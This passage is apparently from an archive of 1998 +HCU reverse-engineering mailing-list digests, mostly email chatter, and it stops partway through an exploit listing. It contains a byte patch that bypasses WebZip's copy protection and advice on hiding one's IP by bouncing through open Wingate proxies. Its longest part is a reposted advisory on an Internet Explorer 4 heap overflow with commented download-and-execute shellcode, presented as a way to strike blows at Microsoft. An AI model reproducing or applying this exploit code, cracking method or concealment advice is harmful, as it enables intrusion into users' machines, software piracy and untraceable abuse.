home *** CD-ROM | disk | FTP | other *** search
/ Reverse Code Engineering RCE CD +sandman 2000 / ReverseCodeEngineeringRceCdsandman2000.iso / RCE / Library / +HCU / 111-120.TXT < prev    next >
Text File  |  2000-05-25  |  56KB  |  1,608 lines

  1. ========================================================
  2. +HCU Maillist          Issue: 111             01/08/1998
  3. --------------------------------------------------------
  4. Send Articles To:......................... *************
  5. Info, Help, Unsubscription, etc:....... ****************
  6. Web Repository.........................hcuml.home.ml.org
  7. ========================================================
  8.  
  9. CONTENTS:
  10.  
  11. #1  Subject: ATTN: Aesculapius, Hackmore, Stone, Zer0degree
  12.  
  13. #2  Subject: Correction
  14.  
  15. ARTICLES:
  16.  
  17. -----#1-------------------------------------------------
  18. Subject: ATTN: Aesculapius, Hackmore, Stone, Zer0degree
  19.  
  20. You should have received an email from me for your address. I'm sending
  21. this message here in case the email got lost. If you haven't sent me your
  22. address yet, please do so soon. Thanks.
  23.  
  24. ~~
  25. Ghiribizzo
  26.  
  27.  
  28. -----#2-------------------------------------------------
  29. Subject: Correction
  30.  
  31. -----BEGIN PGP SIGNED MESSAGE-----
  32.  
  33.  
  34. In the article I wrote concerning the Tutorial
  35. format and databases, some extra HTML tags
  36. seem to have appeared. The <bigger> and
  37. </bigger> tags were not in my original email
  38. and extra '<'s have been added to the tags I
  39. originally had in my email.
  40.  
  41. Is this a bug from the script to handle the
  42. email or have they been added deliberately?
  43.  
  44. ~~
  45. Ghiribizzo
  46.  
  47. -----BEGIN PGP SIGNATURE-----
  48. Version: PGP for Personal Privacy 5.0
  49. Charset: noconv
  50.  
  51. iQEVAwUBNLM2Yv2BzbC3j9ThAQFyFwf+LIEwsGteDx6clAn9zkFiRa0+22+oCJbS
  52. FYWWy2HeMRKQj3MxaTeVwGtwn30ez5LQmdbdmFszjcTHZIJBRu+QTmlBvQEoaw8M
  53. hOA5Y+utC/kqWXsu++mkqH78RFzm9sCTWnAi45hSSm+3SXDJTjFFAt5Qk9seBp0S
  54. fDDgf4uwAwU/DZGoyVxfL0/ca0rfbNvEFrzwC5GRqRDR4Hs+Ox/LWHlV3G/ay9bu
  55. Bypd6FFcsbQICpt5Kds3LfcQcMERl5GSRn5filzCqfErwiSiXtBZU9rT6oAjorpp
  56. 71jBfnnyqYse+trDIKjyLetKo3/LhxxzormJpFRUd4ELizEG+FgCrg==
  57. =sgle
  58. -----END PGP SIGNATURE-----
  59.  
  60.  
  61.  
  62. =====End of Issue 111===================================
  63.  
  64.  
  65.  
  66.  
  67. ========================================================
  68. +HCU Maillist          Issue: 112             01/09/1998 
  69. --------------------------------------------------------
  70. Send Articles To:......................... *************
  71. Info, Help, Unsubscription, etc:....... ****************
  72. Web Repository.........................hcuml.home.ml.org
  73. ========================================================
  74.  
  75. CONTENTS:
  76.  
  77. #1  Subject: script is working well
  78.  
  79. #2  Subject: none
  80.  
  81. #3  Subject: Hotmail caveats
  82.  
  83. ARTICLES:
  84.  
  85. -----#1-------------------------------------------------
  86. Subject: script is working well
  87.  
  88. Hi Ghiribizzo!
  89.  
  90. The digester script is working well, the tags were in your mail
  91. exactly as they appeared in the issue. Either you sent them or
  92. the replay remailer inserted it (unlikely).
  93. In 95% of the cases the letter body are pasted into the digest
  94. byte by byte automatically, while I am sleeping :). Usually, only
  95. if the letter is sent to a wrong address I have the opportunity to
  96. check it before sending. Sometimes in those cases (like today the 
  97. letter of Thor) if the lines are too long, I reformat it by inserting 
  98. CR/LFs, but change nothing else.
  99. Here, I would like to ask all of you to use short 50-60 character 
  100. lines, if possible. A great number of subscribers get the issues at
  101. hotmail where the letter window is small and more convinient to read
  102. shorter lines. (BTW, I am pleased that you do not send your letters 
  103. as HTML formatted text too, which seems to be a new sport on other
  104. maillists since the new browsers came out :)
  105.  
  106. bye Zer0+
  107.  
  108. -----#2-------------------------------------------------
  109. Subject: none
  110.  
  111. This one again went to the wrong address. Boys, try to send the
  112. articles to the ************* address.
  113. Zer0+
  114.  
  115.  
  116.  
  117. Hi to all, and happy new year,
  118.  
  119.  
  120. I was reading the 109th +HCU mailing list and  i notice that razzia+
  121. wrote about the shrlk.dll,  that reminds me a programm whith this dll
  122. (Shrlk20.dll - is it the same?), A little searching in my notes and voila.
  123. It was the webzip v. 1.30. In fact this was my first (and thank God
  124. succesfull cracking session). From my notes i copy:
  125.  
  126. "It uses a DLL named Shrlk20.dll in the system32 dir which has all the
  127. routines, for the protection. Its checkprotectionDll routine doesn't
  128. respond to this type of crack. One byte changed from 7F07 E805 090000
  129. IN THE SHRLK20.DLL to EB07à. From JG to JMP and its works OK"
  130.  
  131. And i do remember that it had some modules including checkprotectionDll.
  132. When i cracked it i worried about this module  but finally it was checking
  133. ...... the weather???
  134.  
  135. BTW i'm newbie nerd etc, but i'm trying I love you Guys...
  136.  
  137. Hi to:  Fravia+, (Hi Fravia!),  Aeculapius (YES!)
  138.  
  139. Keep on
  140. Thor+
  141.  
  142.  
  143.  
  144. -----#3-------------------------------------------------
  145. Subject: Hotmail caveats
  146.  
  147. Hello everyone
  148.  
  149. Hotmail and other mail providers have never been secure. I know 
  150. definitely
  151. that bigfoot has given out details in the past. Though if you keep your
  152. activities legal and low-key you should be OK.
  153.  
  154. encryption
  155. do
  156. the following:
  157.  
  158.  
  159.  
  160.  
  161.  
  162.  
  163.  
  164. =====End of Issue 112===================================
  165.  
  166.  
  167.  
  168.  
  169. ========================================================
  170. +HCU Maillist          Issue: 113             01/10/1998 
  171. --------------------------------------------------------
  172. Send Articles To:......................... *************
  173. Info, Help, Unsubscription, etc:....... ****************
  174. Web Repository.........................hcuml.home.ml.org
  175. ========================================================
  176.  
  177. CONTENTS:
  178.  
  179. #1  Subject: ZipLock
  180.  
  181. #2  Subject: Re: script is working well
  182.  
  183. #3  Subject: Save disabled targets - MFC menu structures
  184.  
  185. ARTICLES:
  186.  
  187. -----#1-------------------------------------------------
  188. Subject: ZipLock
  189.  
  190. Good evening to all. 
  191. Has anybody worked on the ZipLock program, or rather software which 
  192. has been wrapped up with ZipLock ?
  193. I think it might provide an interesting project.
  194.  
  195. Best regards,
  196.       Zipper49.
  197.  
  198. ****************************
  199.  
  200. ______________________________________________________
  201. Get Your Private, Free Email at **********************
  202.  
  203. -----#2-------------------------------------------------
  204. Subject: Re: script is working well
  205.  
  206.  
  207. -----BEGIN PGP SIGNED MESSAGE-----
  208.  
  209. -----#3-------------------------------------------------
  210. Subject: Save disabled targets - MFC menu structures
  211.  
  212.  
  213. Hi all,
  214.  
  215. I've recently been looking at a Win32 demo program with disabled functionality. At first sight anyway all the code appears to be there <good!> but some menu functions are hardcoded disabled. 
  216.  
  217. The thing is written with MFC so all the menu handling is done through data structures with pointers to 'on_click' and update handlers for each menu  item (or whatever they are called, I've never used MFC). 
  218.  
  219. I stumbled around and managed enable 'Save As' which is all I really need but I wonder if anyone knows more about the menu data structures MFC uses? A fragment of a menu item list looks like this
  220.  
  221.  dd 111h
  222.  dd 0
  223.  dd 32855        ; Paste menu item ID
  224.  dd 32855
  225.  dd 0Ch
  226.  dd offset PasteClick    ; Paste Handler
  227.  dd 111h
  228.  dd 0FFFFFFFFh
  229.  dd 32855
  230.  dd 32855
  231.  dd 2Ch
  232.  dd offset PasteUpdate    ; Paste menu item update Handler
  233.  
  234. Is this structure documented somewhere?
  235.  
  236. Spyder
  237.  
  238. ********************
  239.  
  240.         
  241.  
  242.  
  243. =====End of Issue 113===================================
  244.  
  245.  
  246.  
  247.  
  248. ========================================================
  249. +HCU Maillist          Issue: 114             01/12/1998 
  250. --------------------------------------------------------
  251. Send Articles To:......................... *************
  252. Info, Help, Unsubscription, etc:....... ****************
  253. Web Repository.........................hcuml.home.ml.org
  254. ========================================================
  255.  
  256. CONTENTS:
  257.  
  258. #1  Subject: hmail 
  259.  
  260. ARTICLES:
  261.  
  262. -----#1-------------------------------------------------
  263. Subject: hmail 
  264.  
  265. Hello Everyone
  266.  
  267. Well it seems Iam back to hotmail problems again, e.g. only half
  268. of a Email message getting through,etc. Can anyone recommend any
  269. organisations offering free Email?
  270.  
  271. The old and rest of the Email that did not make it.
  272.  
  273. >Hotmail and other mail providers have never been secure. I know 
  274. >definitely
  275. >that bigfoot has given out details in the past. Though if you keep 
  276. >your activities legal and low-key you should be OK.
  277. >encryption.
  278. For someone who has not been surfing the Internet for very long.
  279. Iam starting to feel that I have entered a warzone, with all the
  280. security for Email, Webpages, Surfing the net, etc. Is it a
  281. losing battle or myopia on the part of Big Brother and other
  282. individuals who think they can gain total control? IMHO, the
  283. heterogenous of society will not let this take place.
  284.  
  285. cheers Rundus
  286.  
  287. ______________________________________________________
  288. Get Your Private, Free Email at **********************
  289.  
  290. =====End of Issue 114===================================
  291.  
  292.  
  293.  
  294.  
  295. ========================================================
  296. +HCU Maillist          Issue: 115             01/13/1998 
  297. --------------------------------------------------------
  298. Send Articles To:......................... *************
  299. Info, Help, Unsubscription, etc:....... ****************
  300. Web Repository.........................hcuml.home.ml.org
  301. ========================================================
  302.  
  303. CONTENTS:
  304.  
  305. #1  Subject: long rambling bs on freemail, etc...
  306.  
  307. #2  Subject: Iname
  308.  
  309. #3  Subject: free mailbox
  310.  
  311. #4  Subject: hmail
  312.  
  313. ARTICLES:
  314.  
  315. -----#1-------------------------------------------------
  316. Subject: long rambling bs on freemail, etc...
  317.  
  318. Rundus:
  319.  
  320. First of all, here are a few resources for free email, etc..
  321.  
  322. ***********************************************************
  323. **************************************************
  324. *************************************************************************************************
  325.  
  326. Now security is always going to be a problem...when sending, many of 
  327. these freemail providers include your IP address as part of the email 
  328. header. For anonymity, this is no good. Your best bet for security when 
  329. sending email--assuming you do not want the person you are sending to  
  330. to have any info about you--is using ************** or 
  331. ****************** (these both have WWW-based anonymous emailers).
  332.  
  333. When receiving email, as long as you use a psuedonym on your email 
  334. account, everything will be fine. You can assume that everything going 
  335. in and out of your email account can be read by any one at any 
  336. time...there is no way to stop that (except by encrypting your emails, 
  337. which somewhat detracts from the convenience of the medium), but you can 
  338. stop that email account from being traced to your person or your PC.
  339.  
  340. Why all this healthy paranoia? Because it is so "simple", or so commonly 
  341. done...there is no real privacy. Except for the real privacy: being lost 
  342. in the crowd. You see, there is just too damn much traffic on the 
  343. internet for it all to be monitored for incriminating material.
  344.  
  345. To illustrate:I once worked at a 24/7 market which had upwards of twenty 
  346. cameras running full time and recording everything...they had to change 
  347. twenty VCR tapes every four hours! Good security? Not quite. The store 
  348. could not afford to pay anyone to watch 20x24hours worth of video tapes 
  349. a day...therefore the employees and customers were able to rob the place 
  350. blind! The tapes were _only_ good for nailing someone that they knew was 
  351. up to something...
  352.  
  353. Get the picture? If you are not suspect, you are "safe". The  trick is 
  354. to be careful and not stupid...use fake names, do not send emails from 
  355. your personal machine (except through an anonymizer) if you think the 
  356. person on the other end is going to try to trace back to you (i.e., a VB 
  357. programmer wouldn't but a cracker might just for fun!)--guard your IP 
  358. address, it leads to your ISP! Other than that, unless you put big signs 
  359. up on your web page posting how you hacked the FBI's site, you are 
  360. probably alright.
  361.  
  362. _m
  363.  
  364.  
  365.  
  366. ______________________________________________________
  367. Get Your Private, Free Email at **********************
  368.  
  369. -----#2-------------------------------------------------
  370. Subject: Iname
  371.  
  372. I have found ************* to be very reliable and fast.  I have no idea
  373. about its security.  I suspect it is no better than other free email
  374. services.  Anyone know?
  375.  
  376. zinger
  377.  
  378. -----#3-------------------------------------------------
  379. Subject: free mailbox
  380.  
  381. Rundus wrote:
  382.  
  383. >Well it seems Iam back to hotmail problems again, e.g. only half
  384. >of a Email message getting through,etc. Can anyone recommend any
  385. >organisations offering free Email.
  386.  
  387. I also noticed that hotmail was completely down a couple of times
  388. lately (seems MS really started to take over it :)
  389. In my experiance netaddress.usa.net works fine. It also has
  390. the advantage that you can download your mail by any POP3 mailer.
  391.  
  392. Zer0+
  393.  
  394. -----#4-------------------------------------------------
  395. Subject: hmail
  396.  
  397. -----BEGIN PGP SIGNED MESSAGE-----
  398.  
  399. Netforward offer a email forwarding service if that's what you want. 
  400. Otherwise you could try Geocities. They offer free web pages and also give 
  401. out free email addresses. Just signup and post a bogus boring web site and 
  402. you've got an email account. Oh, you need an email account to set it up - 
  403. last time I did this, Geocities accepted hotmail addresses.
  404.  
  405. As for the incomplete email, I got that too. It looks like an echo of part of 
  406. a message I posted in an earlier issue. I think something is wrong because 
  407. first of all the HTML tags were added to my post (the tags are NOT in the 
  408. copy of the email I sent in the outbox) and then a PGP signed message I sent 
  409. was not transmitted properly (only the first PGP line was shown) and now this 
  410. echo. Anyone got any idea what's going on?
  411.  
  412. ~~
  413. Ghiribizzo
  414.  
  415. -----BEGIN PGP SIGNATURE-----
  416. Version: PGP for Personal Privacy 5.0
  417. Charset: noconv
  418.  
  419. iQEVAwUBNNObf/2BzbC3j9ThAQErwAgAt6hsteSyHpy0F+67Wv4pecv6UdMhh+ki
  420. WVE9k/kHlUJ5XfqW2I0ZzjDFuG+7OyRf13LH5S2Wv5XE3bZJVzjZ65nCNnvdPnRj
  421. WYbEC5+m2jJo9q5w3x0+zs1+oblhdzYvPvH77UMAfoiBld5Zl6vSlL6Ja+XVL5yl
  422. RfqdVadw2G1g0ngAQ9wX9IlOylamx7HnkFzHTndkwKeFiFmaueaNxkr2zMQ/5Xo2
  423. WtAK4jxAqsMTrTA+QIeM8AdrHX6+Crzc94KIz/73LxhlJtcGOSuKNPiHiCp7AdNy
  424. nGO59xPU/NEUX/9ojcuj0NJeTu4uU4YhiCWImLVoCHNTLfduFNmDuQ==
  425. =wcoE
  426. -----END PGP SIGNATURE-----
  427.  
  428.  
  429. =====End of Issue 115===================================
  430.  
  431.  
  432.  
  433.  
  434. ========================================================
  435. +HCU Maillist          Issue: 116             01/15/1998 
  436. --------------------------------------------------------
  437. Send Articles To:......................... *************
  438. Info, Help, Unsubscription, etc:....... ****************
  439. Web Repository.........................hcuml.home.ml.org
  440. ========================================================
  441.  
  442. CONTENTS:
  443.  
  444. #1  Subject: Thank You
  445.  
  446. #2  Subject: for java buff (by fravia+)
  447.  
  448. #3  Subject: Anonymous (?) email...
  449.  
  450. #4  Subject: +RCG's 'Heavy Protection'
  451.  
  452. #5  Subject: M$ Explorer Flaw
  453.  
  454. ARTICLES:
  455.  
  456. -----#1-------------------------------------------------
  457. Subject: Thank You
  458.  
  459. Hello Everyone
  460.  
  461. I would like to thank everyone for their replies and help.
  462.  
  463. With regards to Email security, its an area in which I
  464. must allocated more time and effort too. Iam sure Fravia
  465. knows what I eat for breakfast :-).
  466.  
  467. cheers Rundus
  468.  
  469.  
  470.  
  471. ______________________________________________________
  472. Get Your Private, Free Email at **********************
  473.  
  474. -----#2-------------------------------------------------
  475. Subject: for java buff (by fravia+)
  476.  
  477. A nice present for all our java buffs, I believe :-)
  478.  
  479. s/install/
  480.  
  481.  
  482.  
  483. 'course you can go
  484.  
  485.  
  486.  
  487. -----#3-------------------------------------------------
  488. Subject: Anonymous (?) email...
  489.  
  490.  
  491.  
  492. Since it seems to be of great importance to find a better/more anonymous 
  493. way to send and receive email, some tricks of the trade which can really 
  494. assist you in defending your privacy:
  495. (this tricks are only for SENDING mail, since receiving is not that
  496. much a problem)
  497.  
  498. Get a shell account or something similar; at least a telnet client
  499. is necessary. You can send email by telnetting to a mailserver to 
  500. port 25 (telnet victim.com 25) and then using the SMTP commands.
  501.  
  502. "HELO ****************  /* introduces you to the server */ 
  503. "mail from: ******************* /* this will appear in the header */
  504. "rcpt to: ****************** /* obvious */
  505. "data"
  506. Now enter your email, end of email is signalled by a single 
  507. "."(enter)
  508.  
  509. O.K, now we get a small problem: 99% of all mailservers log your
  510. IP and stamp it on top of the mail, which is something we strongly
  511. want to avoid. Now, to disguise this IP, we use either the WinGate-
  512. bouncing or FTP-bouncing attack. I won't go into details about FTP-
  513. bouncing, Hobbit wrote a good paper about that. 
  514.  
  515. Wingate is another trick how Windoze can be good for you: It is a prog
  516. which allows a whole network to use one connection, nice for schools 
  517. etc. 
  518. Now, the bug is: If you telnet to a Wingate on port 23, you'll most 
  519. likely get a prompt like this "Wingate> ". If you have found one, you've 
  520. struck gold, since you can now enter the hostname & port you
  521. want to telnet to, and Wingate will connect you :-), effectively 
  522. disguising your IP. This is said to be fixed in the newest version, 
  523. but there are still plenty of old Wingates out. 
  524.  
  525. Note: Attention, you're NOT 100%ly untraceable, since some Wingates log 
  526. such activity. (most do not, though).
  527.  
  528. How to find Wingates ? This is a bit of work. Write yourself a small
  529. C-program, or download a portscanner from the internet. If you write
  530. your own, all it has to do is to try to open a connection on port 23 to 
  531. a whole bunch of IP-Adresses you specify, and then logging all who
  532. respond into a file (with their response). Lateron, you just search 
  533. through that file for the Wingate prompt. 
  534.  
  535. Multiple bounces are possible, thus lowering the chance of being logged.
  536.  
  537. Another thing I haven't tried yet (since I don't know yet how to write 
  538. raw packets) is to fake the reply-address in the packetheader; this 
  539. might work since sending mail doesn't require you to receive data. 
  540. (You'd better fake it to an IP whose server is down, though, :-)
  541.  
  542. Anybody here who is interested in that kind of stuff ? Learning in 
  543. groups is always more fun than alone :-)
  544.  
  545.  
  546. Halvar from Flake :-) 
  547.  
  548.  
  549.  
  550.  
  551. ______________________________________________________
  552. Get Your Private, Free Email at **********************
  553.  
  554. -----#4-------------------------------------------------
  555. Subject: +RCG's 'Heavy Protection'
  556.  
  557. Well, I downloaded some of the essays regarding +RCG's self32
  558. protection and then decided to download his 'heavy' protection. In the
  559. few intervening minutes I saw that Fravia had updated his page and that
  560. Quine had already cracked it! You really have to be quick off the
  561. mark to be the first these days :)
  562. I quote part of the letter by Quine which can be found on the protecti
  563. page.
  564.  
  565. >>>>
  566. with the hasp encryption.  The solution, by the way, is to create a
  567. 10h byte long file called key.dat which contains 00h through 0Fh.  The
  568. key, as +RCG tells us is too easy, but even with a completely random
  569. key of 10h bytes it would have taken about 2 minutes to find it.  I'm
  570. not going to explain how I figured out that it was a 10h byte string
  571. xor'd with the code from 4012B9h to 401300h because it's fairly easy
  572. to figure that out.  Here's how to find the key.  Isolate the
  573. encrypted bytes in their own file, load that file in HexWorkshop, and
  574. print it out.  You Should have something that looks like this:
  575. <<<<
  576.  
  577. The length of the file is basically given to us in the exe. This could
  578. be improved slightly by reading say 100h bytes and then XORing until a
  579. terminator (00h) was found and then encrypted again. This would conceal
  580. the filelength using the source sniff method.
  581.  
  582. It would still, however, be susceptible to a more 'cryptographic' approach.
  583. This method (counting coincidences) is simple and is outlined in Bruce 
  584. Schneier's book 'Applied Cryptography' (a must buy for all crackers).
  585. Oh, this quote should be learned by all protectionists:
  586.  
  587. "There's no real security here. This kind of encryption is trivial to 
  588. break even without computers." [regarding XOR encryption]
  589.  
  590. He then goes on to list the method of breaking XOR encryption.
  591.  
  592. The key flaw in the protection was using a short key. The key used
  593. MUST be the SAME length as the code to be encrypted (i.e. an OTP)
  594.  
  595. The real difficulty is programming a random number generator for the OTP
  596. as the entire security of the system lies in the RNG. I noticed chaos
  597. being mentioned in one of RCG's later essays and I toyed with the idea of
  598. using a one dimensional chaotic system (Sierepinski Carpet (sp?)) as a RNG
  599. but it was too much of a headache making sure the numbers were truely
  600. random. Your best bet is to look out for some ready made RNGs make sure that
  601. they designed for cryptography and not just some homegrown RNG.
  602. To my knowledge, no one has yet made a truely random RNG.
  603.  
  604. ~~
  605. Ghiribizzo
  606.  
  607. BTW, never reuse an OTP, this destroys it's security.
  608.  
  609.  
  610. -----#5-------------------------------------------------
  611. Subject: M$ Explorer Flaw
  612.  
  613.  
  614. Yes, I DO know that this is NOT a hacking-related mailinglist, but
  615. I got a few thoughts to share as well as an interesting article from
  616. Bugtraq....
  617.  
  618. First of all: In hacking, the most important things needed was C 
  619. programming and UNIX knowledge, since most servers used to run on 
  620. UNIX or derivatives. 
  621. But now, that M$ NT takes over more and more sites, the importance
  622. of C slowly fades, often replaced with ASM. The methods change 
  623. radically. 
  624. The so-called "Buffer overflow exploits" are IMHO more related to 
  625. "cracking" in the widest sense than to anything else. I won't go into
  626. detail about them, anyone interested should read Aleph1s Article in 
  627. Phrack... (was it 49?) 
  628.  
  629. Anyways, the following text demonstrates how knowledge of assembly and 
  630. some good ideas can be used to strike major blows at the M$ Juggernaut. 
  631. Nothing strikes the trust of people harder than vulnerabilities like 
  632. this; and this is an encouragement for all those
  633. Windows-Assembly Gurus out there (I am unfortunately more into learning 
  634. C right now and it's hard for me to use Win95 once you've
  635. come to install Linux :-) or even the HCU to start a project concerning 
  636. M$ security flaws.
  637.  
  638. Anyways, the following article comes directly from BugTraq, and can 
  639. be viewed at l0pht.com. 
  640.  
  641.  
  642.  ========
  643.  Scenario
  644.  ========
  645.  
  646.   TAKE TWO!
  647.  
  648.   The Microsoft Internet Explorer 4.0(1) Suite, including all programs 
  649. supplied
  650.   with it that read and/or process HTML from either local machines, 
  651. intranet
  652.   machines, or remote internet machines are subject to a buffer overflow 
  653. in the
  654.   HTML decoding process. The buffer overflow can cause the application 
  655. to page
  656.   fault, or in the worst case, execute arbitrary precompiled native 
  657. code.
  658.  
  659.   Unlike the res:// bug, found a few months ago, this bug _does_ affect
  660.   Windows NT as well as Windows 95.
  661.  
  662.   It has also been reported that this bug affects Internet Explorer 3.0 
  663. if
  664.   you have Visual Studio (VC++/J++ etc) installed on your system. Though 
  665. this
  666.   may be true, and if so, exploitable, there has not been exploit code 
  667. written
  668.   up for it.
  669.  
  670.   Currently, sample exploit code has been written for:
  671.  
  672.         Windows 95 OSR1 and OSR2 running IE4.0 or IE4.01
  673.  
  674.   Systems known vulnerable:
  675.  
  676.         Windows 95 OSR1, OSR2 running IE3.0x+Infoviewer, IE4.0, IE4.01
  677.         Windows NT Workstation/Server running IE4.0,IE4.01
  678.  
  679.  =======
  680.  Example
  681.  =======
  682.  
  683.   Much like the res:// overflow, this bug can be seen in action by 
  684. clicking on
  685.   a link -or- having the browser auto-refresh to a URL with the 
  686. executable
  687.   code in the url. Please look at the L0pht Advisory homepage for this 
  688. bug for
  689.   a detailed example of the problem.
  690.  
  691.  =================
  692.  Technical Details
  693.  =================
  694.  
  695.   The problem here lies in the deciphering of the URL line format 
  696. itself. The
  697.   base HTML library that is used by the Internet Explorer 4.0 Suite and 
  698. the
  699.   following programs are vulnerable:
  700.  
  701.         - Outlook Express (both mail and news)
  702.         - Windows Explorer
  703.         - Internet Explorer (different than regular explorer, really)
  704.  
  705.   This problem, because it stems from a programming flaw in the HTML 
  706. decoding
  707.   system, is unaffected by the Explorer "Security Zones" feature. In 
  708. other
  709.   words, if you turn on the highest security level for the zone from 
  710. where the
  711.   exploit HTML is being viewed, you are still vulnerable.
  712.  
  713.   The critical problem here is a buffer overflow in the parsing of a 
  714. particular
  715.   new type of URL protocol. The "mk:" type of URL is meant to access
  716.   proprietary Microsoft 'InfoViewer Topics', as exhibited by the 
  717. InfoViewer of
  718.   Visual Studio, and the Help System of IE4.0(1).
  719.  
  720.   For example, the URL for the Microsoft IE4.0 help system is:
  721.  
  722.        *****************************************************************
  723.  
  724.   The buffer overflow is not a standard stack overflow, but rather a 
  725. _heap_
  726.   overflow. This complicated coding exploits, but is, nonetheless, 
  727. do-able.
  728.  
  729.  ========
  730.  Solution
  731.  ========
  732.  
  733.   Currently, there is no solution available for this flaw. You can't set 
  734. any
  735.   Internet Explorer options to avoid it, and you are not protected by 
  736. any
  737.   level of zone security. Simply don't surf the web, read email or view
  738.   net news using Internet Explorer 4.0(1) until Microsoft puts up a 
  739. hotfix.
  740.  
  741.  ============
  742.  Exploit Code
  743.  ============
  744.  
  745.   Ok. This time, I'm going to assume you know something about stack 
  746. overflows
  747.   and writing generic buffer overflow scripts. If you're lost already, 
  748. then the
  749.   rest of this sure as hell ain't going to make any sense to you.
  750.  
  751.   The exploit code overflows a buffer on the heap, overwriting a few 
  752. critical
  753.   heap variables and, eventually leaving the EIP at a ridiculous point 
  754. in the
  755.   middle of URLMON.DLL ready to crash, unless you, bold coder, know what 
  756. to
  757.   stuff in those registers.
  758.  
  759.   Turns out that when you overflow that heap buffer, you can stuff a 
  760. value
  761.   right into EAX. This is important, because the critical code section 
  762. that you
  763.   reach looks like this:
  764.  
  765.         (URLMON!.text+)
  766.         014F:702A365E  8B08                         MOV ECX,[EAX]
  767.         014F:702A3660  50                           PUSH EAX
  768.         014F:702A3661  FF5108                       CALL [ECX+08]
  769.  
  770.   (Incidentally, all the addresses here are for DLL's provided with 
  771. IE4.01
  772.   not IE4.0. The code is similar for IE4.0. Just different offsets. 
  773. Onward.)
  774.  
  775.   You need that CALL [ECX+08] to jump to something useful. The place 
  776. where
  777.   it jumps is to a location in URLMON.DLL (or was it MSHTML.DLL, I 
  778. forget.)
  779.   that has an instruction that looks like CALL ECX. To get the NULL 
  780. bytes and
  781.   things in the right places involves a little finagling of the string 
  782. using
  783.   %00, and the null-terminator of the URL. It's really fun. Trust me.
  784.  
  785.   After that CALL ECX happens, your EIP points to a piece of code that 
  786. is
  787.   in your exploit space. Then, just jump to the beginning of the exploit 
  788. code
  789.   and start having fun. I used CALL to save a byte. (Who cares about the 
  790. stack
  791.   now anyway? You've already blown it to hell.)
  792.  
  793.   Ok. Here's it. (Described in terms of IE4.01)
  794.  
  795.   Commented disassembly: (starting at ****************
  796.  
  797. > Skip over the jump tables
  798.  
  799. 0057CC7C: 3BC0                         cmp    eax,eax
  800. 0057CC7E: 7468                         je     00057CCE8
  801.  
  802. > blah blah blah
  803.  
  804. 0057CC80: 90                           nop
  805. 0057CC81: 90                           nop
  806. 0057CC82: 90                           nop
  807.  
  808. > Jump tables start here for WININET.DLL functions
  809. > WinInet Function addresses:
  810. >
  811. >                    (dated 9/18/97) IE4.0       (dated 11/18/97) IE4.01
  812. > InternetOpenA           0x702120B9                  0x70211817
  813. > InternetOpenUrlA        0x7021949F                  0x70219345
  814. > InternetCloseHandle     0x7020422B                  0x7020422E
  815. > InternetReadFile        0x7020E2DC                  0x7020E3C4
  816.  
  817. 0057CC83: BFE9E7DE8F                   mov    edi,08FDEE7E9  
  818. (InternetOpenA)
  819. 0057CC88: F7DF                         neg    edi
  820. 0057CC8A: FFE7                         jmp    edi
  821. 0057CC8C: BFBB6CDE8F                   mov    edi,08FDE6CBB  
  822. (InternetOpenUrlA)
  823. 0057CC91: F7DF                         neg    edi
  824. 0057CC93: FFE7                         jmp    edi
  825. 0057CC95: BFD2BDDF8F                   mov    edi,08FDFBDD2  
  826. (InternetCloseHandle)
  827. 0057CC9A: F7DF                         neg    edi
  828. 0057CC9C: FFE7                         jmp    edi
  829. 0057CC9E: BF88C741E0                   mov    edi,0E041C788  
  830. (InternetReadFile)
  831. 0057CCA3: D1EF                         shr    edi,1
  832. 0057CCA5: FFE7                         jmp    edi
  833.  
  834. > End WININET Jump Table
  835.  
  836. 0057CCA7: 90                           nop
  837.  
  838. > Start Kernel Offset Table for Win95 OSR 2 (no bad 
  839. characters/nulls/otherwise!)
  840. > Win95B Function addresses:
  841. >
  842. >  WinExec      (0xBFF9D330)
  843. >  _lopen       (0xBFF773FB)
  844. >  _lclose      (0xBFF98283)
  845. >  _lwrite      (0xBFF9CDE8)
  846. >  _lcreat      (0xBFF9CDBE)
  847. >  ExitProcess  (0xBFF8AECD)
  848. >  GlobalAlloc  (0xBFF74904)
  849.  
  850. 0057CCA8:  30 D3 F9 BF-FB 73 F7 BF-83 82 F9 BF-E8 CD F9 BF
  851. 0057CCB8:  BE CD F9 BF-CD AE F8 BF-04 49 F7 BF-
  852.  
  853. > Start Kernel Offset Table for Win95 OSR 1 (no bad ones here either!)
  854. > Win95A Function addresses:
  855. >
  856. >  WinExec      (0xBFF9D330)
  857. >  _lopen       (0xBFF773FB)
  858. >  _lclose      (0xBFF98283)
  859. >  _lwrite      (0xBFF9CDE8)
  860. >  _lcreat      (0xBFF9CDBE)
  861. >  ExitProcess  (0xBFF8AECD)
  862. >  GlobalAlloc  (0xBFF74904)
  863.  
  864. 0057CCC4:  F8 CF F9 BF-B7 72 F7 BF-CF 80 F9 BF-B0 CA F9 BF
  865. 0057CCD4:  86 CA F9 BF-B0 AF F8 BF-04 49 F7 BF-
  866.  
  867. > blah blah blah
  868.  
  869. 0057CCE4: 90                           nop
  870. 0057CCE5: 90                           nop
  871. 0057CCE6: 90                           nop
  872. 0057CCE7: 90                           nop
  873. 0057CCE8: 90                           nop
  874.  
  875. > check windows kernel version by querying random byte that happens to
  876. > be different in the two versions. Also, set up ESI to be a pointer to
  877. > the kernel offset table for the correct version.
  878.  
  879. 0057CCE9: BB8BFFF7BF                   mov    ebx,0BFF7FF8B
  880. 0057CCEE: 2AFF                         sub    bh,bh
  881. 0057CCF0: 8BF5                         mov    esi,ebp
  882. 0057CCF2: B032                         mov    al,032
  883. 0057CCF4: 3803                         cmp    [ebx],al
  884. 0057CCF6: 750E                         jne    00057CD06
  885. 0057CCF8: 33C0                         xor    eax,eax
  886. 0057CCFA: B05F                         mov    al,05F
  887. 0057CCFC: 90                           nop
  888. 0057CCFD: 03F0                         add    esi,eax
  889. 0057CCFF: 720E                         jb     00057CD0F
  890. 0057CD01: 90                           nop
  891. 0057CD02: 90                           nop
  892. 0057CD03: 90                           nop
  893. 0057CD04: 90                           nop
  894. 0057CD05: 90                           nop
  895. 0057CD06: 33C0                         xor    eax,eax
  896. 0057CD08: B07B                         mov    al,07B
  897. 0057CD0A: 90                           nop
  898. 0057CD0B: 03F0                         add    esi,eax
  899. 0057CD0D: 90                           nop
  900. 0057CD0E: 90                           nop
  901. 0057CD0F: 90                           nop
  902.  
  903. > ESI is now a pointer to the first function the the appropriate kernel
  904. > offset table. Now, we need to decode our 'data segment'. Do so, by 
  905. XOR'ing
  906. > (ADD'ing) each byte of the data area with 0x80. This prevents people 
  907. from
  908. > seeing what we're doing, as well as keeping out null characters and 
  909. bad
